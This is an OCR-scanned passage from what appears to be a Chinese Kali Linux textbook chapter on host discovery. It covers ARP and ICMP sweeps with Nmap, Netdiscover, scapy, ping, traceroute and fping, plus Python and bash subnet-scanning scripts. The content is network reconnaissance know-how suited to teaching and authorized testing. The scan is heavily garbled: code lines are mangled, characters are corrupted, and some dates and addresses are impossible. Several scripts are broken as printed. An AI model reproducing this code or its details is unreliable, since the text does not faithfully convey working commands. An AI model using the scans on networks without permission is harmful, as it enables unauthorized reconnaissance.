脚本 具有 可 执行 权限 。 
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在 二 层 扫描 中 ， 用 户 可 以 使 用 工具 
来 扫描 ， 下 面 介 绍 三 个 扫描 工具 的 具体 应 
用 ,分别 是 Nmap、Netdiscover 和 scapy。 


1. Nmap 工 具 


这 里 只 讲解 Nmap 在 二 层 扫描 的 应 用 ， 
Nmap 有 很 多 相应 的 参数 ， 不 过 ， 在 二 层 扫 
描 中 Nmap 不 做 端口 扫描 ， 下 面 介绍 Nmap 扫 
描 工具 在 二 层 扫 摘 中 的 具体 应 用 。 

[step 图 探测 主机 是 否 存 在 ， 这 时 可 以 使 用 
Namp -sn 192.168.1.1 命 令 ， 执 行 效果 如 下 
图 所 示 。 


root@kali:~/Test/2# nmap -sn 192.168.1.1 

Starting Nmap 7.70 ( https:/,nmap.org ) at 2018-10-23 04:44 EDT 
Nmap scan report for 192.168.1.1 

Host is up (0.000654s latencyl. 

MAC Address: 1C:FA:68:01:2F:08 (Tp-link Technologies) 

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds 


网 段 扫描 ， 使 用 Nmap -sn 192. 168. 
1.1-254 命 令 或 者 Nmap -sn 192.168.1.0/24 
命令 可 以 进行 网 段 打 描 ， 执 行 效果 如 下 图 
所 示 。 


rest er eh nmap -sn 192.168.1.1-254 

tarting Nmap 7.79 ( https://nmap.org ) at 2018-10-23 04:47 EDT 
Nmap scan report for 192.168,.1.1 

Host is up. 

MAC Address: 1LC:FA:68:01:2F:08 (Tp-link Technologies) 

Nmap scan report for 192.168.1.100 

Host is up (9.990225 Latency | . 

MAC Address: 900:25:22:F9:5F:44 (ASRock Incorporation) 

Nmap scan report for 192.168,1.101 

Host is Up . 


Nmap done: 254 IP addresses |3 hosts Up) scanned in 7.091 seconds 
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和 阅 提 示 : 在 扫描 过 程 中 ， 用 户 可 以 发 现 使 
用 Nmap 扫 描 要 比 使 用 arping 脚 本 快 得 多 ， 

而 且 还 会 扫描 出 更 多 的 信息 ， 如 网 卡 型 
号 、 主 机 延迟 等 。 


读 取 文件 ， 并 根据 文件 中 给 定 的 地 址 
进行 扫描 ， 使 用 Nmap -iL addr -sn 命令 ， 执 
行 效果 如 下 图 所 示 。 


root@kali:~/Test/2# nmap -iL addr -sn 

Starting Nmap 7.76 ( https://nmap.org ) at 2018-19-23 04:57 EDT 
Nmap scan report for 192.168.1.1 

Host is up (0.00082s Latency ) . 

MAC Address: 1C:FA:68:61:2F:08 (Tp-link Technologies) 

Nmap scan report for 192.168.1.190 

Host is up (0.00015s Latency ) . 

MAC Address: 90:25:22:F9:5F:44 (ASRock Incorporation) 

Nmap scan report for 192.168.1.191 

Host is up. 

Nmap done: 4 IP addresses [3 hosts up) scanned in 0.33 seconds 


2. Netdiscover 工 具 


Netdiscover 是 一 个 ARP 侦 查 工 具 ， 可 用 
于 无 线 网 络 环境 。 该 工具 在 不 使 用 DHCP 的 
无 线 网 络 上 非常 有 用 。 使 用 Netdiscover 工 具 
可 以 在 网 络 上 扫描 IP 地 址 ， 并 检查 在 线 主 机 
或 搜索 为 主机 发 送 的 ARP 请 求 。 

具体 操作 步骤 如 下 : 
主动 打 描 ， 这 时 使 用 netdiscover -i 
eth0 -r 192.168.1.1/24 命 令 ， 其 中 -i 是 指定 网 
卡 ，-I 是 指定 网 络 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


Currently scanning: FinIished' | 


screen View: Unique Hosts 
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 120 
IP At MAC Address Count Len MAC Vendor / Hostname 


192.168.1.1 lc:fa:68:01:2f:08 1 56568 TP-LINK TECHNOLOGIES C0.,LTD. 
192.168.1.199 89:25:22:f9:5f:44 1 68 ASRock Incorporation 


读 取 一 个 文件 并 扫描 文件 中 给 定 的 IP 
地 址 段 ， 这 时 使 用 netdiscover -i ech0 -] add. 
txt 命 令 ， 执 行 效果 如 下 图 所 示 。 


Currently scanning: Finished! | 


Screen View: Unique Hosts 
11 Captured ARP Req/Rep packets, from 3 hosts ， Total size: 660 


ITP At MAC Address Count Len MAC Vendor / Hostname 


192.168.1.1 lc:fa:68:01:2f:08 5 366 TP-LINK TECHNOLOGIES C0.,LTD. 
192 .168.1.109 00:;25:;22:19:;5f:;44 与 36906 ASRock Incorporation 
192.168.1.102 dc:6d:cd:66:fe:;cb 1 60 GUANGDONG DPPO MOBILE TELECOMMUNI 


被 动 打 描 ， 使 用 netdiscover -i 
ech0 -p 命 令 ， 此 时 会 进入 被 动 模式 
(passive) ， 并 扫描 出 当前 在 线 主机 ， 执 
行 效果 如 下 图 所 示 。 
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Currently scanning: (passive)} | Screen View: Unique Hosts 


6 Captured ARP Req/Rep packets, from 2 hosts. Total size: 368 


IP At MAC Address Count Len MAC Vendor / Hostname 


192.168.1.100 6060:25:22:f9:5f:44 2 120 ASRock Incorporation 
192.168.1.1 lc:fa:68:91:2f:98 4 249 TP-LINK TECHNOLOGIES C0. ,LTD . 


人 @ 注 意 : 使 用 主动 扫描 可 能 会 引起 主机 报 
敬 ， 此 时 可 以 采用 被 动 扫描 ， 被 动 扫描 不 
主动 发 送 ARP 数 据 包 ， 而 是 将 网 卡 置 入 混 
杂 模 式 收 集 网 络 中 的 数据 包 从 而 发 现 网 络 
中 的 主机 。 


3. scapy 工 具 


scapy 可 以 作为 python 库 进行 调用 ， 当 
然 也 可 以 单独 作为 工具 使 用 ， 它 可 以 实现 
抓 包 、 人 分析、 创建 、 修 改 、 注 入 网 络 流量 
等 功能 。 

使 用 的 具体 操作 步骤 如 下 : 
在 Kali Linux 运 行 界面 中 执行 scapy 命 
令 ， 即 可 进入 scapy 主 界面 ， 如 下 图 所 示 。 
目前 使 用 的 最 新 版 本 为 5.8.0。 


root@kali:~# scapy 
HARNING: No route found for IPV6 destination :: 


[no default route?) 


asPY//YhASa 
apyyYyyYyyCY/////// /YCa 
s¥Y//////YSpes scpCY//Pp 
a ayyyyyYYyYSCP//Pp syY//C 


Welcome to Scapy 
Version 2.4.0 


| 
| 
| 
ASAYYYYYYYY// /Ps cYy//s | 
pCCCCY/ /Pp cSssps y//Y | https://github,com/secdev/scapy 
SPPPP///a pP///AC//Y | 
A//A cyP////C | Have funl 
p///AC sC///a | 
P////YCpc A//A | Craft me if you can, 
scccccp///pSP///Pp p//Y | -- IPv6 layer 
SsY/////////Y caa S//P | 
cayCyayP//Ya pY/Ya 
SY/PsSY////YCc aC//Yp 


SC scCcaCY//PCypaapyCP//YsSs 
spCPY//////YPSpS 
ccaacs 


using IPython 5.8.0 


| 

[step 图 初次 使 用 可 能 会 有 一 个 警告 WARNING: 
No route found for IPv6 destination :: (no 
default route?) 命 令 ， 这 是 由 于 缺少 gnuplot 
支持 。 这 时 ， 可 以 使 用 apt-get install python- 
gnuplot 命 令 米 安装 该 软件 ， 执 行 效果 如 下 
图 所 示 。 


ootgKkaLI:~ apt-get install python-gnuplot 
在 读 取 软件 包 列 表 ..-. 完成 


在 分 析 软 件 包 的 依赖 关系 树 

在 读 取 状态 信息 ... 完成 

列 软 忻 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 

Libxz65-169 python-backports.ssl-match-hostname python-beautifulsoup 
ruby-terminal-table ruby-unicode-display-width 

用 'apt autoremove' 来 邯 才 它 (它们 ). 

列 【 新 】 软 件 包 将 被 安装 : 

python-gnuplot 
Rf 


要 下 载 83.4 kB 的 归档 。 
压缩 后 会 消耗 567 kB 的 预 外 空间 。 


在 scapy 工 具 中 ， 使 用 ARP().display() 
命令 ， 可 以 显示 出 ARP 数 据 包 的 头 结构 ， 
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如 下 图 所 示 。 其 中 ARP() 是 一 个 函数 ， 
display0) 属 于 ARP0O 的 一 个 子 函 数 。 


>>> ARP().display!() 
央 ##[ ARP ]### 


hwtype= 90X1 
ptype= QOx800 
hwlen= 6 
plen= 4 


op= who-has 

hwsrc= 00:0Cc:29:39:f2:9c 
psrc= 192.168.1.101 
hwdst= 00:00:00:00:00:00 
pdst= 0.0.0.0 


侈 提示 : 通常 ，ARPO 在 使 用 时 可 以 先 定义 
一 个 变量 ， 然 后 用 ARP() 为 其 赋值 ， 一 旦 赋 
值 完 成 ， 变 量 便 具 有 ARPO 的 功能 ， 例 如 : 
arp=ARPO， 定 义 变量 amp 并 赋值 。 


构建 查询 数据 包 ， 使 用 arp. 
pdst="192.168.1.1" 命 令 ， 构 建 一 个 查询 
192.168.1.1 的 数据 包 ， 执 行 arp.displayO) 命 
令 ， 执 行 效果 如 下 图 所 示 。 可 以 看 到 pdst 字 
段 已 经 被 修改 。 


>>> arp=ARPI() 

>>> arp.pdst="192.168.1.1" 
>>> arp.display!() 

浊 ## 大 [只 RP  ]###### 


hwtype= 9Xx1 
ptype= OQx800 
hwlen= 6 
plen= 4 


op= who-has 

hwsrc= 00:0c:29:39:f2:9c 
psrc= 192.168.1.1601 
hwdst= 00:00:00:00:00:00 
pdst= 192.168.1.1 


[step 图 发 送 构 建 的 数据 包 ， 构 建 完 数据 包 
后 ， 可 以 使 用 Sr10 将 数据 包 发 送出 去 ， 执 行 
srl(arp) 命 令 ， 执 行 效果 如 下 图 所 示 。 发 送 
数据 包 后 可 以 看 到 应 答 数 据 包 信息 ， 其 中 
op 字段 将 变 成 is-at 应 答 ， 源 地 址 目的 地 址 信 
息 也 会 改变 。 


>>> Srl(arp) 
Begin emission: 
..*Finished Sending 1 packets . 


Received 3 packets，got 1 answers, remaining 9 packets 

<ARP hwtype=0xl1 ptype=6x800 hwlen=6 pLen=4 op=is-at hwsrc=lc:1a:68:0 
1:2f:68 psrc=192.168.1.1 hwdst=00:0c:29:39:f2:9c pdst=192.168.1.161 | 
<Padding load='\x80\xAE\xQD\xO0\xAO\xON\xO0\xOAO\ X00\ xOO\ xOO\ xAO\ X00\ 
xOD\xO0\xOE\x0D\x00' |>> 


查询 返回 数据 包 信息 。 当 发 送 完 数 据 
包 后 ， 会 返回 一 定 的 数据 ， 这 个 返回 的 数 
据 可 以 作为 信息 赋值 给 一 个 变量 ， 例 如 : 

answWeI=SsT1(arp)。 通 过 使 用 answer.displayO) 
命令 ， 可 以 查看 返回 数据 包 的 信息 ， 执 行 


效果 如 下 图 所 示 。 


>>> answer.display() 

类 ##[ ”ARP  ] #### 

hwtype= 0Xx1 

ptype= 9x869 

hwlen= 6 

plen= 4 

op= is-at 

hwsrc= lc:fa:68:01:2f:08 

psrc= 192.168.1.1 

hwdst= 00:0c:29:39:f2:9c 

pdst= 192.168.1.101 

####[ Padding ]#### 

load= '\X909N\Xxg9g9\xgg\xggvxg9g\x99\Xx99\Xxo9 
B\Xx99\X99\X99\X99\Xx99\Xxg99N\X99N\X99N\X99N\X99， 


数据 包 的 发 送 与 显示 ， 通 过 一 条 指令 
可 以 完成 数据 包 的 发 送 与 显示 ， 该 命令 为 
srl1(ARP(pdst="192.168.1.1")).display()， 执 
行 效 果 如 下 图 所 示 。 


>>> Srl(ARP(pdst="192.168.1.1")).display() 
Begin emission: 
Finished sending 1 packets. 


Received 1 packets, got 1 answers, remaining 9 packets 
大 ###[ ARP ]### 

hwtype= 0X1 

ptype= Qx800 

hwlen= 6 

plen= 4 

op= 15S-at 

hwsrc= lc:fa:68:01:2f:08 

psrc= 192.168.1.1 

hwdst= 00:9c:29:39:f2:9cC 

pdst= 192.168.1.101 
###[ Padding ]### 

Load= '\X09\X00\X00\X00\X00\XxX90\Xx90\x90\Xx99\Xx909\Xxg9 

OO\xO0\xO0\xOO0\xOO0\xOO\xOO0\xAOO' 


男 外 ，scapy 工 具 文 持 使 用 python 脚 本 
语言 调用 ， 下 面 给 出 一 段 调用 脚本 代码 。 
具体 代码 如 下 : 


#!/usr/bin/python  #python 和 脚本 格式 
import logging # 导 入 日 志 库 文件 
import subprocess  # 导 入 系统 命令 调用 库 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
# 设 置 日 志 等 级 
from scapy.all import * 
# 导 入 scapy 库 的 所 有 文件 
if len(sys.argv) !=2: # 如 果 输 入 的 参数 不 
等 于 2 做 出 提示 下 面 是 具体 提示 信息 
Dri UageQ oepdleocany 
[interfacel]" 
Drink Exampie So /qrn disc py ethn” 


print "Example will perform an ARP 
Scan of the local Subnet to which eth0 
is assigned" 
SYS .exit() 
interface = str(sys.argv[il1]l) 
# 将 网 卡 参数 赋值 给 变量 interface 
# 执 行 jfconfig 命 令 从 中 第 选 出 信息 
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ip = 号 和 CE SS ES 
output ("ifconfig"+" "+interface+" | grep 
"inet" ",shell=True) .strip() 
ee # 截 取 IP 字 段 
BEeflix Tn DLTtt FIOlt 1 
i 
# 截 取 IP 前 三 个 字段 
for addr in range (0,254): # 定 义 循环 
ip=prefix+str (addr) # 构 建 IP 地 址 
# 下 面 这 段 代码 用 于 发 送 数 据 包 ， 设 置 超时 时 间 
0.1ms，verbose=0 不 显示 错误 信息 
answer = Srl (ARP (pdst=ip),timeout= 
0 ernose=@ 
if answer == None: # 过 滤 掉 空 信息 
pass # 如 果 没 有 信息 过 滤 掉 
else: 


print ip # 打 印 出 存活 主机 


除 此 之 外 ， 还 可 以 编写 用 于 读 取 文本 
的 脚本 ， 该 脚本 可 以 读 取 指定 文件 ， 并 扫 
描 文件 中 给 定 的 耳 地 址 ， 有 具体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if lenl(sys.argv) '!=2: 
下 
[Interface]7” 
9 
DLliSt EG 
print "Example will perform an ARP 
Scan of the local subnet to which eth0 
is assigned™" 
sys.exit () 
filename = strl(sys.argv[1]) # 定 义 一 个 
变量 读 取 文件 名 
file = open (filename, 'r') 提 以 读 的 形式 打 
开 该 文件 
for adqr in file: # 每 次 从 文件 中 读 取 一 行 


answer = srl(ARP(pdst=addr. 
strip()),timeout=0.1,verbose=0)# 以 文件 中 
的 IP 地 址 发 送 
if answer == None : 
pass 
else: 


print addr.strip() # 将 有 返回 的 IP 进 
行 显示 


10.3 ”三 层 扫描 
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是 可 能 会 被 边界 防火 墙 过 滤 掉 。 三 层 扫描 
主要 是 通过 IP、ICMP 协 议 来 进行 扫描 ， 理 
论 上 通过 三 层 扫描 可 以 发 现任 何 一 台 在 线 
的 主机 ， 当 然 前 提 是 它 接 收 并 返回 相应 的 
IP、ICMP 数 据 包 。 


10.3.1 使 用 Ping 命 令 


Ping 指 的 是 端 对 端 连通 ， 通 常用 来 作 
为 可 用 性 的 检查 ， 但 是 茶 些 病毒 木马 会 强 
行 大 量 远程 执行 Ping 命 令 来 抢占 用 户 的 网 
络 资源 ， 导 致 系统 变 慢 ， 网 速 变 慢 。 因 此 
大 多 数 防火 墙 的 一 个 基本 功能 便 是 过 滤 
Ping 数 据 包 。 

IP 协 议 是 将 多 个 包 交 换 网 络 连 接 起 
来 ， 它 在 源 地 址 和 目的 地 址 之 间 传 送 一 种 
称 之 为 数据 包 的 东西 ， 它 还 提供 对 数据 大 
小 的 重新 组 装 功 能 ， 以 适应 不 同 网 络 对 数 
据 包 大 小 的 要 求 。 


你 注意 : IP 不 提供 可 靠 的 传输 服务 ， 
ee (路 由 ) 站 点 到 (路 由 ) 

点 的 确认 ， 对 数据 没有 差错 控制 ， 它 只 
Pn eben 忆 不 提供 重 发 和 流量 
控制 。 如 果 出 错 可 以 通过 ICMP 报 告 ，ICMP 
在 也 模块 中 实现 。 


ICMP 是 (Internet Control Message Pro- 
tocol)〉Internet 控 制 报 文 协议 。 它 是 TCP/IP 
协议 族 中 的 子 协议 ， 用 于 在 主机 、 路 由 器 
之 间 传 递 控制 消息 。 控 制 消息 是 指 网 络 通 
不 通 、 主 机 是 否 可 达 、 路 由 是 否 可 用 等 网 
络 本 身 的 消 轧 。 这 些 控制 消息 虽然 并 不 传 
输 用 户 数据 ， 但 是 对 于 用 户 数据 的 传递 起 
独 重 要 的 作用 。 

下 面 介 绍 Ping 命 令 的 使 用 ， 具 体操 作 步 
又 如 下 : 

在 Kali Linux 系 统 界面 中 ， 执 行 Ping 
-命令 可 以 查看 Ping 命 令 的 帮助 信息 ， 执 行 
效果 如 下 图 所 示 。 
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root@kali:~# ping -h 

Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I InterTace] 
[-m mark] [-M pmtudisc option] [-L preload] [-p pattern] [-0 tos] 
[-5 packetsize] [-5 sndbuf] [-t ttl] [-T timestamp option] 
[-w deadline] [-N timeout] [hopl ...] destination 

Usage: ping -6 [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface] 
[-L preload] [-n mark] [-M pmtudisc option] 
[-N nodeinfo option] [-p pattern] [-Q tclass] [-s packetsize] 
[-S5 sndbuf] [-t ttl] [-T timestamp option] [-w deadline] 
[-W timeout] destination 


如 果 需 要 执行 发 送 的 数据 ee 
Fn 192.168.1.1 -c 3 命令 

中 ，-c 参 数 的 作用 是 指定 发 送 npg 
执行 效果 如 下 图 所 示 。 


root@kali:~# ping 192.168.1.1 -c 3 

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. 

64 bytes from 192.168.1.1: icmp seq=1 ttl=64 time=0.940 ms 
64 bytes from 192.168.1.1: icmp seq=2 ttl=64 time=1.01 ms 
64 bytes from 192.168.1.1: icmp seq=3 ttl=64 time=1.22 ms 


- 192.168.1.1 ping statistics --- 
3 packets transmitted, 3 received, 0% packet loss, time 6ms 
rtt min/avg/max/mdev = 0.940/1.055/1.216/0.120 ms 


通过 Wireshark 工 具 可 以 抓 取 数据 包 ， 
其 中 包含 源 地 址 与 目的 地 址 ， 以 及 ICMP 协 
议 中 的 Type 字段 ， 该 字段 为 8 个 ， 执 行 效果 
如 下 图 所 示 。 


» INternet ProOEocoI Version 4, STC: IyZ2.168.1.161, Ust: 192.168.1.1 
Y Internet Control Message Protocol 

Type: 8 (Echo (ping) request) 

Code: 日 

Checksum: GQxa4de [correct] 

[checksum Status: Good] 

Identifjier (BE): 4491 (OX1131) 

Identifier (LE): 12561 (Bx3111) 

seguence number (BE): 1 (Ox00901) 

sequence number (LE): 256 (Ox0100) 

[Response frame: 6] 

Timestamp from icmp data: Dct 24, 2018 23:47:35.0000006000 EDT 

[Timestamp from icmp data (relative): 0.885739416 seconds] 

» Data (48 bytes) 


查看 返回 数据 包 中 的 ICMP 协 议 ， 该 
数据 包 中 的 ICMP 协 议 Type 字 段位 为 0， 执 
行 效 果 如 下 图 所 示 。 


» InNnternet PrOEOCOI Version 4, SrC” ITI92.T168.T.TIT，DSsSE” 1I927.T68.T.TBT 
* Internet Control Message Protocol 

Type: © (Echo (ping) reply) 

Code: 0 

Checksum: QO@xacde [correct] 

[Checksum Status: Good] 

Identifier (BE): 4401 (Ox1131) 

Identifier (LE): 12561 (9x3111 ) 

Sequence number {BE): 1 (9x90091 ) 

Sequence number {LE): 256 (Ox016g) 

[Request frame: 5] 

[Response time: 1.376 ms] 

Timestamp from icmp data: DCct 24, 2018 23:;47:35.990000060 EDT 


[Timestamp from icmp data (relative): 0.887115143 seconds] 
» DaLa {46 byLcs) 


查看 到 达 目 标 地 址 经 过 多 少 跳 路 由 
器 ， 使 用 traceroute 命 令 可 以 查看 到 达 目 标 
地 址 经 过 多 少 跳 路 由 器 ， ee 
所 示 。 图 中 给 出 了 部 分 路 由 节点 ， 可 以 看 
到 当前 路 由 器 设置 了 ICMP 数 据 包 过 滤 。 


root@kali:-~# traceroute www.baidu 

RE to www-baidu.com (220. 1 111.188), 38 hops max, 60 byte packets 
1 

2 本 本 本 

3 + +*+* 


em 
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traceroute (Windows 系 统 下 是 tracert) 命令 利用 ICMP 协 议定 位 用 户 的 计算 机 和 目标 
计算 机 之 间 的 所 有 路 由 器 ， 它 是 侦 测 主机 到 目的 主机 之 间 所 经 路 由 情况 的 重要 工具 ， 也 
是 最 便利 的 工具 。 使 用 traceroute 命 令 侦 测 主 机 的 详细 过 程 如 下 : 

(1) 将 传递 到 目的 IP 地 址 的 ICMP Echo 消 息 的 TTL 值 被 设置 为 1!1， 该 数据 报 经 过 第 
一 个 路 由 器 时 ， 其 TTL 值 减 去 1， 此 时 新 产生 的 TIL 值 为 0。 

(2) 由 于 TTL 值 被 设置 为 0， 路 由 器 判断 此 时 不 应 该 党 试 继 续 转 发 数据 报 ， 而 是 直 
接 抛 弃 该 数据 报 。 由 于 数据 报 的 生存 周期 (TTL 值 ) 已 经 到 期 ， 这 个 路 由 器 会 发 送 一 个 
ICMP 时 间 超 时 ， 即 TTL 值 过 期 信息 返回 到 客户 端 计 算 机 。 

(3) 此 时 ， 发 出 traceroute 命 令 的 客户 端 计 算 机 将 显示 该 路 由 器 的 名 称 ， 之 后 可 以 
再 发 送 一 个 ICMP Echo 消息 并 把 TTL 值 设置 为 2。 

(4) 第 1 个 路 由 器 仍然 对 这 个 TTL 值 减 1。 如 果 可 能 ， 将 这 个 数据 报 转 发 到 传输 路 径 
上 的 下 一 跳 。 当 数据 报 抵达 第 2 个 路 由 器 ，TTL 值 会 再 被 减 去 1， 成 为 0。 

(5) 第 2 个 路 由 器 会 像 第 1 个 路 由 器 一 样 ， 抛 弃 这 个 数据 包 ， 并 像 第 1 个 路 由 器 那样 


返回 一 个 ICMP 消 息 。 


(6) 该 过 程 会 一 直 持 续 ，traceroute 命 令 会 不 停 地 递增 TTL 值 ， 而 传输 路 径 上 的 路 
由 器 不 断 递 减 该 值 ， 直 到 数据 报 了 最 终 抵达 预期 的 目的 地 。 
(7) 当 目 的 计算 机 接收 到 ICMP Echo 消息 时 ， 会 回 传 一 个 ICMP Echo Reply 消 息 。 


过 滤 网 络 中 存活 主机 的 IP 地 址 ， 使 用 
Ping 192.168.1.1 -c 3 | grep "bytes from" | cut 
-d""-f4|cut-d":" -fl 命令， 可 以 将 网 络 中 
存活 主机 的 人 P 地 址 过 滤 出 来 ， 执 行 效果 如 下 
图 所 示 。 


root@kali:-~# ping 192.168.1.1 -c 5 | grep "bytes from' 
| cut -d"" -f4 | cut -d":" -f 1 

192.168.1.1 

192.168.1.1 

192.168.1.1 

192.168.1.1 

192.168.1.1 


通过 上 面 过 滤 的 特性 可 以 编写 一 个 自 
动 化 Ping 的 shell 脚 本 。 具 体 代码 如 下 : 


#!/bin/bash 
if [ "S$#" -ne 1 ];then 
echo"Usage-./Pingl.sh [interface]" 
echo"Excample—“ /Pingl.sh 1192 16 人 1” 
echo"Example will perform an ICMP 
scan of the 192.168.1.0/24 range " 
exit 
fi 
prefix=$1 
for addr in $(seq 1 200) ;do # 循 环 发 送 
Ping 命 令 到 地 址 段 


EIngy co 1 opretixz Saddr grep 
"ves Trom | eu =d ”41 Ceutad 
和 
done 


当然 也 可 以 编写 一 个 通过 读 取 文件 来 
进行 扫描 的 shell 脚 本 。 具 体 代 码 如 下 : 


#!/bin/bash 
if [ "S$#" -ne 1 ];then 
echo"Usage-./Ping2.sh [interfacel]" 
echo"Excample-./Ping2.sh file" 
echo™ Example will perform an ICMP 
scan of the file in range " 
exit 
fi 
file=$1  # 定 义 一 个 变量 将 参数 赋值 给 变量 
for addr in S(cat S$file);do # 读 取 文 件 
中 的 内 容 ， 每 循环 一 次 读 取 一 行 
Ping -c 1 S$addr | grep "bytes from" 
本 
done 


10.3.2 ”使 用 工具 扫 摘 
在 三 层 扫 描 中 ， 可 以 使 用 scapy、 
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Namp、fping、hping 等 工具 来 扫 拉 当前 网 络 
存活 的 主机 。 


1. scapy 工 具 


使 用 scapy 工 具 的 操作 步骤 如 下 : 
step 加 使 用 scapy 工 具 构 建 Ping 包 ， 定 义 
变量 i 并 赋值 为 IP(O)， 定 义 变 量 p 并 赋值 为 
ICMPO， 再 定义 Ping 变 量 ， 将 IP 包 与 ICMP 
包 组 合 赋值 给 Ping， 执 行 效果 如 下 图 所 示 。 


> 1=IPT] 


>> p=ICMP() 
> ping=(i/p) 
p>> ping.display!) 


内 ##[ IP ]#### 好 大 大 [ CMP ]## 龙 
verslon= 4 type= echo-request 
ihl= None code= 0 
tos= OxO chksum= None 
len= None id= Ox0 
id= ] seq= @x0 
flagas= 
rag= 0 
ttl= 64 
proto= icmp 
chksun= Nonec 


src= 127.0.0,1 
dst= 127.0.0.1 
\options\ 


发 送 Ping 包 检查 返回 数据 信息 ， 给 [IP 
包 赋值 为 目标 地 址 ， 使 用 Sr10 方 法 发 送 数据 
包 ， 并 查看 返回 数据 包 的 信息 ， 执 行 效果 
如 下 图 所 示 。 


>>> ping[IP] .dst = "192.168.1.1" 

>>> a = Srl(ping) 

Begin emission: 

.Finished sending 1 packets. 

砷 

Received 2 packets, got 1 answers, remaining 6 packets 
>>> a.display() 
专 ##[ IP ]## 认 天 
version= 4 


天 # 枚 [ ICMP  ] 天 ### 
type= echo-reply 


ihl= 5 code= 6 

tos= Ox0 chksum= Oxffff 

Len= 28 id= Bx 

1d= 52119 seq= QOx#%0 

flags= ###[ Padding ] 才 ### 

frag= 0 Load= '\xDE\xQO\xOO\xO0\xE0\xO0\xA0\xO0\xO0\ 


ttls=s 64 

proto= icmp 
chksum= 0x2b93 
src= 192.168.1.1 
dst= 192.168.1,101 
\options\ 


使 用 命令 构建 Ping 包 ， 该 命令 为 : 
srl(IP(dst="192.168.1.1")/ICMPO). 
display()， 执 行 效 有 果 如 下 图 所 示 。 


E>> srllIP(dst="192.168.1.1*1/ICMP()).display() 
Begin emission: 

.Finished sending 1 packets. 

+ 


Received 2 packets, got 1 answers, remaining © packets 


XOO\XOAO\ XO\ XOO\ XOO\ XOAO\ XAO\ XOO\ XOO' 


才 才 #[ IP ] 并 六 者 ###| ICMP ] 站 者 
version= 4 type= echo-reply 
ihl= 5 code= 0 
tos= OxO chksun= @xffff 
len= 28 id= OxO 
id= 52348 seq= 9x0 
flags= ###[ Padding ]### 
frag= 9 load= '\xOO\xOO\xO00\x00\x00\xQG\ XDO\ XO0\x%0O0N 
ttl= 64 xQO\xOO\ XO0\xO0\xOO\xOO\ X00\AOO0\xO0" 
proto= iecnmp 


chksum= Q@x2aae 
src= 192.168.1.1 
dst= 192.168.1.101 
\options\ 


通过 上 面 的 命令 ， 可 以 编写 一 个 目 动 
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码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if lenl(sys.argv) !=2 : 
print Vaaqgeq OU py 
[interfacel™" 
BE 本 ae 大 本 人 二 于 
二 号 2 人 
print “Example will perform an ICMP 
scan of the 192.168.1.0/24 range" 
SYS .exit () 
address = str(sys.argv[1]) # 定 义 一 个 
变量 ， 将 参数 赋值 给 变量 
# 白 分 出 IP 地 址 
prefix = address.split(".") 
Po 
EL address plet ee Vyhait ss 
for addr in Tange{ll, 254]). 
ip=prefix+str (addr) # 组 装 IP 地 址 
# 构 建 Ping 包 并 发 送 ， 设置 超时 时 间 0 .1lms， 不 
显示 错误 信息 
answer = Srl(IP(dst=prefixt+i 
str(addr))/ICMP(),timeout=0.1,verbose=0) 
if answer == None: 
pass 
else: 


# 将 存活 主 


print prefix+str (addr) 


机 IP 地 址 打印 出 来 


当然 也 可 以 将 IP 地 址 存放 在 一 个 文件 
中 ， 通 过 python 脚 本 读 取 文件 中 的 JP 地址 进 
行 扫描 ， 有 具体 代码 如 下 : 


#!/usr/bin/python 

import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

from scapy.all import * 

if lenl(sys.argv) !=2 : 

DrEIDnE USage 

[interfacel]" 


En 
Drint™ Examnmole TN ELIngLl pv 
Ee wn BR 7: Ph et be 

print “Example will perform an ICMP 
Scan of the 192.168.1.0/24 range" 

SYS .exit () 

filename = str(sys.argv[1])# 定 义 一 个 变 

量 , 将 参数 中 的 文件 名 赋值 给 变量 


file = open (filename ,'r') # 定 义 一 个 
变量 ,使 用 open 方 法 以 读 的 方式 打开 文件 
for addr in file: 
每 次 读 取 一 行 IP 地 址 
answer = Srl(IP(dst=addr.strip())/ 
ICMP(),timeout=0.1,verbose=0) 


if answer == None: 


# 从 文件 中 


pass 
else: 


# 将 存活 主 


print addr.stript()} 


机 IP 地 址 打印 出 来 
2. Nmap 工 具 


在 二 层 扫 描 时 ， 可 以 使 用 Nmap 工 具 进 
行 扫 描 ， 在 三 层 扫描 中 也 可 以 使 用 Nmap 工 
具 ， 但 是 地 址 却 不 同 ， 二 层 只 能 在 本 机 网 
段 进行 扫描 ， 三 层 可 以 使 用 任何 网 段 。 

使 用 Nmap 工 具 进 行 三 层 扫描 的 具体 
方法 为 : 使 用 Nmap 220.181.111.0/24 -sn 命 
令 ， 换 用 不 同 地 址 段 的 王 进行 扫描 ， 它 会 发 
送 ICMP 数 据 包 ， 执 行 效 果 如 下 图 所 示 。 


root@kali:~/Test/3# nmap 220.181.111.6/24 -Sn 

starting Nmap 7.70 ( https://nmap.org ) at 2018-16-25 04:31 EDT 
Nmap scan report for 229.181.111.16 

Host is up (6.063s Latency ) . 

Nmap scan report for 220.181.111.21 

Host is up (6.049s Latency ) . 

Nmap scan report for 220.181.111.22 

Host is up (6.0725 Latency ) . 


3. fping 工 具 


fping 工 具 同 Ping 工 具 类 似 ， 但 是 它 不 
是 系统 自 带 的 ， 它 比 Ping 工 具 返 回 的 信息 量 
更 大 。 其 中 常用 参数 介绍 如 下 : 

e -g: IP 区 间 表 示 需 要 增加 -g 参 数 ， 

可 以 用 fping -g 192.168.1.0/24 这 
样 的 形式 展示 也 可 以 用 fping -g 
192.168.1.1 192.168.1.254 这 样 区 间 
展现 的 形式 。 

e -q: 安静 模式 ， 所 谓 安 静 就 是 中 途 

不 输出 错误 信息 ， 直 接 在 结果 中 显 
示 ， 输 出 结构 整齐 、 高 效 。 

-C: 输入 每 个 IP 探 测 的 次 数 。 

-i: 通过 -i 参数 可 以 修改 发 包间 隔 ， 
